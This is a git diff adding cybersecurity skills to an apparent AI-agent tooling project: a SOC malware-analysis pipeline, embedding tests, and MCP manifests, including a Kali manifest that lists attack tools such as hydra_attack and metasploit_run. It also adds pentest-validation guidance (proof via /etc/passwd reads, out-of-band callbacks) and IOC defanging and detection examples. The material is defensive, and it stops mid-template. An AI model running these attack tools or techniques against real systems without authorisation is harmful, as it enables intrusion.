+│                    PICERL + MITRE ATT&CK                           │
+└─────────────────────────────────────────────────────────────────────┘
+
+  ┌──────────────┐
+  │   PHASE 0    │  Preparation
+  │  Plan + Assess│──────────────────────────────────────────────┐
+  └──────┬───────┘                                               │
+         │                                                       │
+         ▼                                                       │
+  ┌──────────────┐     ┌─────────────────────────────────┐       │
+  │   PHASE 1    │     │  Skill: malware-triage           │       │
+  │   Triage     │────▶│  Hashes, reputation, classify    │       │
+  └──────┬───────┘     └─────────────────────────────────┘       │
+         │                                                       │
+    ╔════╧════╗   Known family?                                  │
+    ║ GATE 1  ║──── YES ──────────────────────────┐              │
+    ╚════╤════╝                                   │              │
+         │ NO                                     │              │
+         ▼                                        │              │
+  ┌──────────────┐     ┌─────────────────────────────────┐       │
+  │   PHASE 2    │     │  Skill: specialized-file-analyzer│       │
+  │Static/Special│────▶│  Format-specific deep analysis   │       │
+  └──────┬───────┘     └─────────────────────────────────┘       │
+         │                                                       │
+    ╔════╧════╗   Executable?           ┌──────────────┐         │
+    ║ GATE 2  ║──── NO ────────────────▶│   PHASE 4    │         │
+    ╚════╤════╝                         │  Detection   │         │
+         │ YES                          └──────┬───────┘         │
+         ▼                                     │                 │
+  ┌──────────────┐     ┌─────────────────────────────────┐       │
+  │   PHASE 3    │     │  Skill: malware-dynamic-analysis │       │
+  │   Dynamic    │────▶│  Sandbox execution + monitoring  │       │
+  └──────┬───────┘     └─────────────────────────────────┘       │
+         │                                                       │
+    ╔════╧════╗                                                  │
+    ║ GATE 3  ║                                                  │
+    ╚════╤════╝                                                  │
+         │                                                       │
+         ▼                                                       │
+  ┌──────────────┐     ┌─────────────────────────────────┐       │
+  │   PHASE 4    │     │  Skill: detection-engineer       │       │
+  │  Detection   │────▶│  Sigma, Suricata, YARA, IOCs    │◀──────┘
+  └──────┬───────┘     └─────────────────────────────────┘
+         │
+    ╔════╧════╗
+    ║ GATE 4  ║
+    ╚════╤════╝
+         │
+         ▼
+  ┌──────────────┐     ┌─────────────────────────────────┐
+  │   PHASE 5    │     │  Skill: malware-report-writer    │
+  │  Reporting   │────▶│  Professional report + ATT&CK   │
+  └──────┬───────┘     └─────────────────────────────────┘
+         │
+    ╔════╧════╗
+    ║ FINAL   ║
+    ║  GATE   ║
+    ╚════╤════╝
+         │
+         ▼
+  ┌──────────────────────────────────────┐
+  │  DELIVERABLES                        │
+  │  • Malware Analysis Report (.md)     │
+  │  • MITRE ATT&CK Mapping Table       │
+  │  • Detection Rules (Sigma/Suricata)  │
+  │  • YARA Rules                        │
+  │  • Defanged IOC List                 │
+  │  • Hunting Queries                   │
+  └──────────────────────────────────────┘
+
+  ┌─────────────────────────────────────────────────────────┐
+  │  CROSS-CUTTING: python-security                         │
+  │  Available in ANY phase for scripting, automation,      │
+  │  custom deobfuscation, network analysis, forensics      │
+  └─────────────────────────────────────────────────────────┘
+```
+
+---
+
+You are the orchestrator. You don't just analyze malware — you run an INVESTIGATION. Every phase builds on the last. Every finding gets tracked. Every detection rule gets tested. The report at the end tells a complete story, from the moment the sample arrived to the moment the SOC can detect and respond to it.
+
+That's how professionals do this. No shortcuts. No sloppy work. Es así de fácil.

--- a/internal/assets/assets.go
+++ b/internal/assets/assets.go
@@ -2,7 +2,7 @@ package assets
 
 import "embed"
 
-//go:embed all:claude all:opencode all:generic all:skills all:gga all:gemini all:codex all:antigravity all:windsurf all:cursor all:kimi all:qwen all:kiro
+//go:embed all:claude all:opencode all:generic all:skills all:gga all:gemini all:codex all:antigravity all:windsurf all:cursor all:kimi all:qwen all:kiro all:agents all:mcps
 var FS embed.FS
 
 // MustRead returns the content of an embedded file or panics.

--- a/internal/assets/assets_cyber_test.go
+++ b/internal/assets/assets_cyber_test.go
@@ -1,0 +1,323 @@
+package assets
+
+import (
+	"io/fs"
+	"strings"
+	"testing"
+)
+
+// TestCyberSkillsAreEmbedded verifies all 10 cybersecurity skill directories
+// are embedded and have SKILL.md files.
+//
+// Spec: cyber-testing — "All cyber skill frontmatter is valid"
+func TestCyberSkillsAreEmbedded(t *testing.T) {
+	cyberSkillNames := []string{
+		"pentest-orchestrator",
+		"ai-pentesting-validation",
+		"exploit-chain-patterns",
+		"waf-detection-bypass",
+		"detection-engineer",
+		"python-security",
+		"malware-triage",
+		"specialized-file-analyzer",
+		"malware-dynamic-analysis",
+		"malware-report-writer",
+	}
+
+	for _, name := range cyberSkillNames {
+		t.Run(name, func(t *testing.T) {
+			skillPath := "skills/" + name + "/SKILL.md"
+			content, err := Read(skillPath)
+			if err != nil {
+				t.Fatalf("Read(%q) error = %v", skillPath, err)
+			}
+
+			if len(strings.TrimSpace(content)) == 0 {
+				t.Fatalf("Read(%q) returned empty content", skillPath)
+			}
+
+			// Must have substantial content (>100 chars beyond frontmatter).
+			if len(content) < 100 {
+				t.Fatalf("Read(%q) content is suspiciously short (%d bytes)", skillPath, len(content))
+			}
+		})
+	}
+}
+
+// TestCyberSkillFrontmatterViaEmbeddedAssets verifies cyber skill frontmatter
+// through the embedded assets (same mechanism as the existing frontmatter test).
+func TestCyberSkillFrontmatterViaEmbeddedAssets(t *testing.T) {
+	skillPaths := embeddedSkillPaths(t)
+
+	// Find cyber skill paths.
+	var cyberPaths []string
+	for _, path := range skillPaths {
+		for _, name := range []string{
+			"pentest-orchestrator",
+			"ai-pentesting-validation",
+			"exploit-chain-patterns",
+			"waf-detection-bypass",
+			"detection-engineer",
+			"python-security",
+			"malware-triage",
+			"specialized-file-analyzer",
+			"malware-dynamic-analysis",
+			"malware-report-writer",
+		} {
+			if strings.Contains(path, name) {
+				cyberPaths = append(cyberPaths, path)
+				break
+			}
+		}
+	}
+
+	if len(cyberPaths) != 10 {
+		t.Fatalf("expected 10 embedded cyber skill paths, got %d", len(cyberPaths))
+	}
+
+	// Run the same frontmatter checks as the existing TestSkillFrontmatterIsLintClean.
+	for _, path := range cyberPaths {
+		t.Run(path, func(t *testing.T) {
+			content := MustRead(path)
+
+			fm, err := extractSkillFrontmatter(content)
+			if err != nil {
+				t.Fatalf("extract frontmatter: %v", err)
+			}
+
+			// name == parent directory basename.
+			expectedName := skillDirBasename(path)
+			if fm.name != expectedName {
+				t.Errorf("name = %q, want %q", fm.name, expectedName)
+			}
+
+			// description must be quoted.
+			if !isQuotedScalar(fm.descriptionRawAfterColon) {
+				t.Errorf("description must be quoted; got: %q", fm.descriptionRawAfterColon)
+			}
+
+			// description must contain Trigger.
+			if !strings.Contains(fm.description, "Trigger:") {
+				t.Errorf("description must contain `Trigger:`; got: %q", fm.description)
+			}
+
+			// description must be <= 160 chars.
+			if len([]rune(fm.description)) > 160 {
+				t.Errorf("description length = %d, want <= 160", len([]rune(fm.description)))
+			}
+		})
+	}
+}
+
+// TestGentlemanSOCAgentIsEmbedded verifies the gentleman-soc agent definition
+// is embedded and readable.
+func TestGentlemanSOCAgentIsEmbedded(t *testing.T) {
+	content, err := Read("agents/gentleman-soc.md")
+	if err != nil {
+		t.Fatalf("Read(agents/gentleman-soc.md) error = %v", err)
+	}
+
+	if len(content) == 0 {
+		t.Fatal("gentleman-soc.md is empty")
+	}
+
+	// Must reference SOC pipeline phases.
+	requiredSections := []string{
+		"Phase",
+		"malware-triage",
+		"detection-engineer",
+		"malware-report-writer",
+	}
+	for _, section := range requiredSections {
+		if !strings.Contains(content, section) {
+			t.Errorf("gentleman-soc.md must contain %q", section)
+		}
+	}
+}
+
+// TestCyberMCPManifestsAreEmbedded verifies all 3 cyber MCP manifests
+// are embedded in the assets.
+func TestCyberMCPManifestsAreEmbedded(t *testing.T) {
+	manifests := []string{
+		"mcps/kali-mcp/manifest.json",
+		"mcps/shodan-mcp/manifest.json",
+		"mcps/virustotal-mcp/manifest.json",
+	}
+
+	for _, path := range manifests {
+		t.Run(path, func(t *testing.T) {
+			content, err := Read(path)
+			if err != nil {
+				t.Fatalf("Read(%q) error = %v", path, err)
+			}
+
+			if len(strings.TrimSpace(content)) == 0 {
+				t.Fatalf("Read(%q) returned empty content", path)
+			}
+		})
+	}
+}
+
+// TestEmbeddedSkillCountIncludesCyberSkills verifies the total skill count
+// includes the 10 cyber skills (32 total: 10 SDD + judgment-day + 6 foundation
+// + 4 sustainable-review + _shared + 10 cybersecurity + 1 go-testing).
+func TestEmbeddedSkillCountIncludesCyberSkills(t *testing.T) {
+	entries, err := FS.ReadDir("skills")
+	if err != nil {
+		t.Fatalf("ReadDir(skills) error = %v", err)
+	}
+
+	skillDirs := 0
+	for _, entry := range entries {
+		if entry.IsDir() {
+			skillDirs++
+		}
+	}
+
+	// 32 skill directories expected.
+	wantSkillDirs := 32
+	if skillDirs != wantSkillDirs {
+		t.Fatalf("expected %d skill directories, got %d", wantSkillDirs, skillDirs)
+	}
+
+	// Verify all cyber skill directories exist.
+	cyberSkillNames := []string{
+		"pentest-orchestrator",
+		"ai-pentesting-validation",
+		"exploit-chain-patterns",
+		"waf-detection-bypass",
+		"detection-engineer",
+		"python-security",
+		"malware-triage",
+		"specialized-file-analyzer",
+		"malware-dynamic-analysis",
+		"malware-report-writer",
+	}
+
+	seenDirs := make(map[string]bool)
+	for _, entry := range entries {
+		if entry.IsDir() {
+			seenDirs[entry.Name()] = true
+		}
+	}
+
+	for _, name := range cyberSkillNames {
+		if !seenDirs[name] {
+			t.Errorf("embedded skills missing cyber skill directory %q", name)
+		}
+	}
+}
+
+// TestCyberSkillBodiesHaveValidationSection verifies every cyber skill has
+// a ## Validation section in its body (beyond frontmatter).
+func TestCyberSkillBodiesHaveValidationSection(t *testing.T) {
+	cyberSkillNames := []string{
+		"pentest-orchestrator",
+		"ai-pentesting-validation",
+		"exploit-chain-patterns",
+		"waf-detection-bypass",
+		"detection-engineer",
+		"python-security",
+		"malware-triage",
+		"specialized-file-analyzer",
+		"malware-dynamic-analysis",
+		"malware-report-writer",
+	}
+
+	for _, name := range cyberSkillNames {
+		t.Run(name, func(t *testing.T) {
+			skillPath := "skills/" + name + "/SKILL.md"
+			content := MustRead(skillPath)
+
+			if !strings.Contains(content, "## Validation") {
+				t.Errorf("%s must contain `## Validation` section", skillPath)
+			}
+		})
+	}
+}
+
+// TestNoForbiddenKeysInCyberSkillFrontmatter verifies cyber skills don't
+// have auto_invoke or tool_schemas in their frontmatter.
+//
+// Spec: cyber-testing — "No auto_invoke or tool_schemas in cyber skill frontmatter"
+func TestNoForbiddenKeysInCyberSkillFrontmatter(t *testing.T) {
+	cyberSkillNames := []string{
+		"pentest-orchestrator",
+		"ai-pentesting-validation",
+		"exploit-chain-patterns",
+		"waf-detection-bypass",
+		"detection-engineer",
+		"python-security",
+		"malware-triage",
+		"specialized-file-analyzer",
+		"malware-dynamic-analysis",
+		"malware-report-writer",
+	}
+
+	forbiddenKeys := []string{"auto_invoke", "tool_schemas"}
+
+	for _, name := range cyberSkillNames {
+		t.Run(name, func(t *testing.T) {
+			skillPath := "skills/" + name + "/SKILL.md"
+			content := MustRead(skillPath)
+
+			fm, err := extractSkillFrontmatter(content)
+			if err != nil {
+				t.Fatalf("extract frontmatter: %v", err)
+			}
+
+			for _, key := range fm.topLevelKeys {
+				for _, forbidden := range forbiddenKeys {
+					if key == forbidden {
+						t.Errorf("cyber skill %s must not have %q in frontmatter", name, forbidden)
+					}
+				}
+			}
+		})
+	}
+}
+
+// TestAllCyberSkillFilesAreDiscoverableViaWalk verifies that fs.WalkDir
+// on the embedded FS finds all 10 cyber skill SKILL.md files.
+func TestAllCyberSkillFilesAreDiscoverableViaWalk(t *testing.T) {
+	var foundPaths []string
+	if err := fs.WalkDir(FS, "skills", func(path string, d fs.DirEntry, err error) error {
+		if err != nil {
+			return err
+		}
+		if d.IsDir() || !strings.HasSuffix(path, "/SKILL.md") {
+			return nil
+		}
+		foundPaths = append(foundPaths, path)
+		return nil
+	}); err != nil {
+		t.Fatalf("WalkDir(skills) error = %v", err)
+	}
+
+	cyberSkillNames := map[string]bool{
+		"pentest-orchestrator":       false,
+		"ai-pentesting-validation":   false,
+		"exploit-chain-patterns":     false,
+		"waf-detection-bypass":       false,
+		"detection-engineer":         false,
+		"python-security":            false,
+		"malware-triage":             false,
+		"specialized-file-analyzer":  false,
+		"malware-dynamic-analysis":   false,
+		"malware-report-writer":      false,
+	}
+
+	for _, path := range foundPaths {
+		for name := range cyberSkillNames {
+			if strings.Contains(path, name) {
+				cyberSkillNames[name] = true
+			}
+		}
+	}
+
+	for name, found := range cyberSkillNames {
+		if !found {
+			t.Errorf("cyber skill %q not found via WalkDir", name)
+		}
+	}
+}

--- a/internal/assets/assets_test.go
+++ b/internal/assets/assets_test.go
@@ -642,9 +642,9 @@ func TestEmbeddedAssetCount(t *testing.T) {
 		}
 	}
 
-	// We expect 22 skill directories (10 SDD + judgment-day + 6 foundation + 4 sustainable-review + _shared).
-	if skillDirs != 22 {
-		t.Fatalf("expected 22 skill directories, got %d", skillDirs)
+	// We expect 32 skill directories (10 SDD + judgment-day + 6 foundation + 4 sustainable-review + _shared + 10 cybersecurity).
+	if skillDirs != 32 {
+		t.Fatalf("expected 32 skill directories, got %d", skillDirs)
 	}
 
 	// Verify each skill directory has a SKILL.md.

--- a/internal/assets/mcps/kali-mcp/manifest.json
+++ b/internal/assets/mcps/kali-mcp/manifest.json
@@ -1,0 +1,27 @@
+{
+  "name": "kali-mcp",
+  "type": "stdio",
+  "description": "Kali Linux security tools via MCP",
+  "config": {
+    "command": "kali-server-mcp",
+    "args": []
+  },
+  "permission_tier": "destructive",
+  "destructive_tools": [
+    "nmap_scan",
+    "sqlmap_scan",
+    "hydra_attack",
+    "metasploit_run",
+    "nikto_scan",
+    "dirb_scan",
+    "gobuster_scan",
+    "wpscan_analyze",
+    "john_crack",
+    "enum4linux_scan"
+  ],
+  "confirmation_required": true,
+  "env": {
+    "KALI_HOST": "<user-configured>",
+    "KALI_SSH_KEY": "<user-configured>"
+  }
+}

--- a/internal/assets/mcps/shodan-mcp/manifest.json
+++ b/internal/assets/mcps/shodan-mcp/manifest.json
@@ -1,0 +1,13 @@
+{
+  "name": "shodan-mcp",
+  "type": "npx",
+  "description": "Shodan internet-connected device search via MCP",
+  "config": {
+    "command": "npx",
+    "args": ["-y", "@modelcontextprotocol/server-shodan"]
+  },
+  "permission_tier": "unrestricted",
+  "env": {
+    "SHODAN_API_KEY": "<user-configured>"
+  }
+}

--- a/internal/assets/mcps/virustotal-mcp/manifest.json
+++ b/internal/assets/mcps/virustotal-mcp/manifest.json
@@ -1,0 +1,13 @@
+{
+  "name": "virustotal-mcp",
+  "type": "npx",
+  "description": "VirusTotal file and URL analysis via MCP",
+  "config": {
+    "command": "npx",
+    "args": ["-y", "@modelcontextprotocol/server-virustotal"]
+  },
+  "permission_tier": "unrestricted",
+  "env": {
+    "VIRUSTOTAL_API_KEY": "<user-configured>"
+  }
+}

--- a/internal/assets/skills/ai-pentesting-validation/SKILL.md
+++ b/internal/assets/skills/ai-pentesting-validation/SKILL.md
@@ -1,0 +1,387 @@
+---
+name: ai-pentesting-validation
+description: "Validate AI pentest findings to prevent hallucinations. Trigger: building security agents, preventing false positives, or scoring vulnerability confidence."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
+---
+
+# AI Pentesting Validation
+
+Prevent AI hallucinations in automated penetration testing by implementing validation pipelines, negative controls, proof-of-execution checks, and confidence scoring.
+
+## When to Use This Skill
+
+Use this skill when you need to:
+- Build AI agents that perform automated security testing
+- Validate that AI-reported vulnerabilities are **real**, not hallucinated
+- Implement **negative control** testing alongside active scans
+- Create **proof-of-execution** verification for findings
+- Score **confidence levels** (0-100) on AI-generated findings
+- Design **validation judges** that approve or reject findings
+- Prevent false positives in automated pentesting pipelines
+
+## The Hallucination Problem in AI Pentesting
+
+AI models can confidently report vulnerabilities that don't exist. In pentesting, a false positive wastes IR resources, damages credibility, and can cause unnecessary panic.
+
+**Common hallucination patterns:**
+- Reporting SQLi on endpoints that return static HTML
+- Claiming XSS on pages with proper CSP headers
+- Declaring RCE without proof of command execution
+- Inventing response content that wasn't in the actual HTTP response
+
+## Anti-Hallucination Pipeline
+
+### Architecture Overview
+
+```
+Finding Generated
+       │
+       ▼
+┌─────────────────┐
+│ Negative Control │──── Sends BENIGN request to same endpoint
+│   Engine         │     If benign triggers same "vuln" → FALSE POSITIVE
+└───────┬─────────┘
+        │ Pass
+        ▼
+┌─────────────────┐
+│ Proof of         │──── Verifies exploit actually worked
+│ Execution Check  │     Checks response for REAL evidence
+└───────┬─────────┘
+        │ Pass
+        ▼
+┌─────────────────┐
+│ Confidence       │──── Scores 0-100 based on multiple signals
+│ Scorer           │     Threshold: typically 60+
+└───────┬─────────┘
+        │ Pass
+        ▼
+┌─────────────────┐
+│ Validation       │──── SOLE authority to approve/reject
+│ Judge            │     No finding enters report without approval
+└───────┬─────────┘
+        │ Approved
+        ▼
+   Valid Finding
+```
+
+### 1. Negative Control Engine
+
+Send a **benign request** to the same endpoint. If the benign request triggers the same detection as the malicious one, the finding is a false positive.
+
+**Principle:** A vulnerability scanner that alerts on normal traffic is broken.
+
+```python
+# Negative control pattern
+class NegativeControl:
+    """
+    For every test payload, also send a benign equivalent.
+    If both trigger the same response pattern, it's a false positive.
+    """
+
+    BENIGN_EQUIVALENTS = {
+        "sqli": [
+            "normal search term",
+            "hello world",
+            "test123",
+        ],
+        "xss": [
+            "normal text without tags",
+            "search query here",
+        ],
+        "command_injection": [
+            "normal-filename.txt",
+            "regular input",
+        ],
+        "path_traversal": [
+            "images/logo.png",
+            "docs/readme.txt",
+        ],
+    }
+
+    def validate(self, vuln_type, endpoint, malicious_response):
+        """
+        Returns True if finding is valid (benign does NOT trigger).
+        Returns False if finding is false positive.
+        """
+        benign_inputs = self.BENIGN_EQUIVALENTS.get(vuln_type, ["test"])
+
+        for benign in benign_inputs:
+            benign_response = self.send_request(endpoint, benign)
+
+            if self.responses_match(malicious_response, benign_response):
+                return False  # FALSE POSITIVE: benign triggers same behavior
+
+        return True  # Valid: only malicious input triggers the behavior
+```
+
+**Key rules:**
+- ALWAYS test the negative control BEFORE confirming a finding
+- Use at least 2-3 benign inputs per vulnerability type
+- Compare response codes, body patterns, AND timing
+- If ANY benign input triggers the same pattern, reject the finding
+
+### 2. Proof-of-Execution Verification
+
+Every vulnerability type needs a **specific proof** that the exploit worked. The AI can't just say "I think it's vulnerable" - it needs evidence.
+
+```yaml
+# Proof requirements per vulnerability type
+proof_requirements:
+  sqli:
+    - Response contains database error message (specific DB engine)
+    - UNION SELECT returns controlled data in response
+    - Boolean blind: measurable response difference (size/content)
+    - Time blind: measurable time delay (>3s difference)
+
+  xss_reflected:
+    - Exact payload appears unencoded in response body
+    - Payload is inside executable context (not inside HTML comment/attribute)
+    - Content-Type is text/html (not JSON or plain text)
+    - No CSP header blocks inline scripts
+
+  xss_stored:
+    - Payload persists across requests (verify on fresh session)
+    - Payload renders in victim context (not admin-only page)
+
+  command_injection:
+    - Output of injected command appears in response
+    - Time-based: measurable delay from sleep/ping command
+    - Out-of-band: DNS/HTTP callback received
+
+  ssrf:
+    - Internal service response data appears in response
+    - Out-of-band: callback received from target server
+    - Cloud metadata endpoint data returned
+
+  path_traversal:
+    - Known file content appears in response (/etc/passwd, win.ini)
+    - Content matches expected format for that file
+
+  idor:
+    - Data from another user/resource is accessible
+    - Verified with at least 2 different unauthorized IDs
+    - Compared with authorized response to confirm difference
+
+  authentication_bypass:
+    - Protected resource accessible without credentials
+    - Session/token validation skipped
+    - Verified by comparing with authenticated vs unauthenticated
+```
+
+**Implementation pattern:**
+
+```python
+class ProofOfExecution:
+    """
+    Validates that a vulnerability finding has concrete proof.
+    Returns proof_found (bool) and proof_details (str).
+    """
+
+    def verify_sqli(self, response, payload_type):
+        if payload_type == "error_based":
+            # Look for REAL database error patterns
+            db_errors = [
+                r"SQL syntax.*MySQL",
+                r"ORA-\d{5}",
+                r"PostgreSQL.*ERROR",
+                r"Microsoft.*ODBC.*SQL Server",
+                r"sqlite3\.OperationalError",
+            ]
+            for pattern in db_errors:
+                if re.search(pattern, response.text, re.IGNORECASE):
+                    return True, f"DB error found: {pattern}"
+
+            return False, "No database error pattern in response"
+
+        elif payload_type == "union_based":
+            # Verify controlled data appears in response
+            marker = "GLITCH_MARKER_12345"
+            if marker in response.text:
+                return True, f"UNION marker '{marker}' found in response"
+            return False, "UNION marker not in response"
+
+        elif payload_type == "time_based":
+            # Verify measurable time difference
+            if response.elapsed.total_seconds() > 5.0:
+                return True, f"Time delay: {response.elapsed.total_seconds()}s"
+            return False, f"No significant delay: {response.elapsed.total_seconds()}s"
+
+    def verify_xss(self, response, payload):
+        # Payload must appear UNENCODED
+        if payload not in response.text:
+            return False, "Payload not found unencoded in response"
+
+        # Must be in HTML context
+        content_type = response.headers.get("Content-Type", "")
+        if "text/html" not in content_type:
+            return False, f"Response is {content_type}, not HTML"
+
+        # Check CSP
+        csp = response.headers.get("Content-Security-Policy", "")
+        if "script-src" in csp and "'unsafe-inline'" not in csp:
+            return False, "CSP blocks inline scripts"
+
+        return True, "Payload renders unencoded in HTML without CSP block"
+```
+
+### 3. Confidence Scoring
+
+Score findings on a 0-100 scale using multiple signals. Don't rely on a single indicator.
+
+```yaml
+scoring_signals:
+  response_code_match:
+    description: "Expected HTTP status code returned"
+    weight: 10
+    example: "500 for SQLi error, 200 for reflected XSS"
+
+  payload_in_response:
+    description: "Exact payload or marker found in response body"
+    weight: 25
+    example: "UNION SELECT marker appears in HTML"
+
+  negative_control_passed:
+    description: "Benign input does NOT trigger same behavior"
+    weight: 25
+    example: "Normal search returns 200, SQLi payload returns 500"
+
+  response_diff_significant:
+    description: "Measurable difference between baseline and exploit response"
+    weight: 15
+    example: "Response size differs by >20%, timing differs by >3s"
+
+  error_pattern_specific:
+    description: "Error message is specific to vulnerability type"
+    weight: 15
+    example: "MySQL syntax error, not generic 500 page"
+
+  reproducible:
+    description: "Finding reproduces on retry (not transient)"
+    weight: 10
+    example: "3/3 attempts return same vulnerable response"
+
+# Confidence thresholds
+thresholds:
+  confirmed: 80    # High confidence, include in report
+  probable: 60     # Medium confidence, include with caveat
+  possible: 40     # Low confidence, needs manual verification
+  rejected: 0-39   # Too low, do not report
+```
+
+**Scoring implementation:**
+
+```python
+class ConfidenceScorer:
+    def score(self, finding):
+        total = 0
+
+        if finding.response_code_expected:
+            total += 10
+        if finding.payload_in_response:
+            total += 25
+        if finding.negative_control_passed:
+            total += 25
+        if finding.response_diff > 0.2:  # >20% difference
+            total += 15
+        if finding.error_pattern_matched:
+            total += 15
+        if finding.reproduced_count >= 2:
+            total += 10
+
+        finding.confidence = total
+        return total
+```
+
+### 4. Validation Judge
+
+The **sole authority** for approving findings. No vulnerability enters the report without passing the judge.
+
+```python
+class ValidationJudge:
+    """
+    Final gate before a finding is accepted.
+    Combines all validation signals into a pass/fail decision.
+    """
+
+    MINIMUM_CONFIDENCE = 60
+
+    def judge(self, finding):
+        verdict = {
+            "approved": False,
+            "reason": "",
+            "confidence": finding.confidence,
+        }
+
+        # Hard rejections (instant fail)
+        if not finding.negative_control_passed:
+            verdict["reason"] = "REJECTED: Failed negative control"
+            return verdict
+
+        if not finding.proof_of_execution:
+            verdict["reason"] = "REJECTED: No proof of execution"
+            return verdict
+
+        if finding.confidence < self.MINIMUM_CONFIDENCE:
+            verdict["reason"] = f"REJECTED: Confidence {finding.confidence} < {self.MINIMUM_CONFIDENCE}"
+            return verdict
+
+        # Passed all checks
+        verdict["approved"] = True
+        verdict["reason"] = f"APPROVED: Confidence {finding.confidence}, proof verified"
+        return verdict
+```
+
+## System Prompts for AI Pentest Agents
+
+When using LLMs to drive pentesting, add these constraints to system prompts:
+
+```markdown
+## Validation Rules (MANDATORY)
+
+1. NEVER report a vulnerability without proof-of-execution
+2. ALWAYS run negative control before confirming a finding
+3. NEVER fabricate response content - quote EXACT bytes from responses
+4. If confidence is below 60, mark as "needs manual verification"
+5. ALWAYS include the exact HTTP request and response in findings
+6. NEVER assume a vulnerability exists based on endpoint naming alone
+7. If you cannot verify a finding, say "unconfirmed" - never "confirmed"
+8. Rate limiting or WAF blocks are NOT vulnerabilities
+9. Missing headers (X-Frame-Options, etc.) are informational, not vulnerabilities
+10. Self-signed certificates in test environments are NOT findings
+```
+
+## Quality Checklist
+
+Before accepting AI-generated pentest findings:
+
+- [ ] Negative control sent and passed (benign input doesn't trigger)
+- [ ] Proof-of-execution verified with concrete evidence
+- [ ] Confidence score calculated (minimum 60 for report inclusion)
+- [ ] Validation judge approved the finding
+- [ ] Exact HTTP request/response included (not AI-generated summary)
+- [ ] Finding is reproducible (tested at least twice)
+- [ ] MITRE ATT&CK technique mapped
+- [ ] Severity matches actual impact (not AI's initial assessment)
+- [ ] No duplicate findings (same vuln, different payloads)
+- [ ] False positive rate monitored across scan session
+
+## Integration Points
+
+This skill integrates with:
+- **detection-engineer** - Validated findings feed into Sigma/Suricata rule creation
+- **exploit-chain-patterns** - Validated findings are inputs for chain analysis
+- **pentest-orchestrator** - Validation pipeline is a core component of orchestration
+- **malware-report-writer** - Report templates include validation status per finding
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Pipeline test**: Verify all four validation stages (negative control, proof-of-execution, confidence scoring, validation judge) are documented with working code examples.
+3. **Proof requirements test**: Check that proof_requirements YAML for each vulnerability type is syntactically valid.
+4. **Scoring test**: Validate the confidence scoring weights sum correctly and thresholds are defined.
+5. **Integration test**: Confirm referenced skills (detection-engineer, exploit-chain-patterns, pentest-orchestrator) exist.

--- a/internal/assets/skills/detection-engineer/SKILL.md
+++ b/internal/assets/skills/detection-engineer/SKILL.md
@@ -1,0 +1,811 @@
+---
+name: detection-engineer
+description: "Create detection rules from malware analysis findings. Trigger: writing Sigma/Suricata rules, defanging IOCs, or generating hunting queries for SOC teams."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
+---
+
+# Detection Engineer
+
+Transform malware analysis findings into production-ready detection rules, hunting queries, and operationalized IOCs.
+
+## When to Use This Skill
+
+Use this skill when you need to:
+- Create YARA rules from malware samples (already covered in malware-report-writer)
+- Write **Sigma rules** for SIEM detection (Splunk, Elastic, QRadar)
+- Create **Suricata/Snort rules** for network IDS/IPS
+- Generate **hunting queries** for EDR platforms
+- **Defang IOCs** for safe documentation and sharing
+- Convert IOCs to **standard formats** (STIX, OpenIOC, CSV)
+- Assess **IOC confidence levels** and volatility
+- Create **detection logic** from behavioral analysis
+- Write **threat hunting hypotheses**
+
+## IOC Management & Defanging
+
+### Why Defang IOCs?
+
+**Problem:** Live IOCs in reports can be:
+- Accidentally clicked (execute malware)
+- Automatically crawled by bots
+- Trigger security tools (email filters, DLP)
+
+**Solution:** Defang (neutralize) IOCs for safe sharing.
+
+### Defanging Patterns
+
+```bash
+# URLs
+http://malicious.com/payload.exe
+→ hxxp://malicious[.]com/payload[.]exe
+
+https://evil.tk/login
+→ hxxps://evil[.]tk/login
+
+# Domains
+malicious.com
+→ malicious[.]com
+
+c2-server.example.org
+→ c2-server[.]example[.]org
+
+# IPs
+192.168.1.100
+→ 192[.]168[.]1[.]100
+
+10.0.0.50
+→ 10[.]0[.]0[.]50
+
+# Email addresses
+attacker@evil.com
+→ attacker[@]evil[.]com
+
+phishing@malware.tk
+→ phishing[@]malware[.]tk
+
+# File paths (optional)
+C:\Windows\System32\malware.exe
+→ C:\Windows\System32\malware[.]exe
+```
+
+### Automated Defanging
+
+**Tool: ioc-fanger (Python)**
+```bash
+# Install
+pip install ioc-fanger
+
+# Defang
+echo "http://malicious.com" | fanger --defang
+# Output: hxxp://malicious[.]com
+
+# Refang (restore for testing)
+echo "hxxp://malicious[.]com" | fanger --fang
+# Output: http://malicious.com
+```
+
+**Manual sed/awk:**
+```bash
+# Defang URLs and domains
+echo "http://malicious.com/payload.exe" | sed 's/http:/hxxp:/g; s/\./[.]/g'
+
+# Defang IPs
+echo "192.168.1.100" | sed 's/\./[.]/g'
+
+# Defang emails
+echo "attacker@evil.com" | sed 's/@/[@]/g; s/\./[.]/g'
+```
+
+### IOC Confidence & Volatility Assessment
+
+| IOC Type | Confidence | Volatility | Reasoning |
+|----------|------------|------------|-----------|
+| **File Hash (SHA256)** | High | Static | Unique to sample, won't change |
+| **Mutex Name** | High | Static | Hardcoded in malware |
+| **PDB Path** | High | Static | Compilation artifact |
+| **Registry Key** | High | Static | Persistence mechanism |
+| **Certificate Hash** | High | Static | Code signing certificate |
+| **IP Address** | Medium | Dynamic | Can change (DGA, fast-flux, hosting) |
+| **Domain (C2)** | Medium | Dynamic | May rotate frequently |
+| **URL Path** | Low-Medium | Dynamic | Often dynamic or timestamped |
+| **User-Agent** | Low | Dynamic | Common strings, high FP rate |
+| **File Path** | Medium | Static | May vary by environment |
+| **Process Name** | Low | Dynamic | Easily changed by attacker |
+
+**Label IOCs appropriately:**
+```markdown
+### Network Indicators (Medium Confidence - Dynamic)
+- Domain: malicious[.]com (C2 server - may rotate)
+- IP: 192[.]168[.]1[.]100 (C2 IP - may change)
+
+### Host Indicators (High Confidence - Static)
+- Mutex: Global\UniqueMalwareMutex
+- Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Malware
+- File Hash: abc123... (SHA256)
+```
+
+---
+
+## Sigma Rule Creation (SIEM Detection)
+
+### What is Sigma?
+
+Sigma is a **generic signature format for SIEM systems**. Write once, convert to Splunk/Elastic/QRadar/ArcSight queries.
+
+**Official Repo:** https://github.com/SigmaHQ/sigma
+
+### Sigma Rule Structure
+
+```yaml
+title: Short Descriptive Title
+id: unique-uuid-for-this-rule
+status: experimental | test | stable
+description: Detailed description of what this detects
+references:
+    - https://attack.mitre.org/techniques/T1059/001/
+author: Your Name
+date: 2025-10-26
+tags:
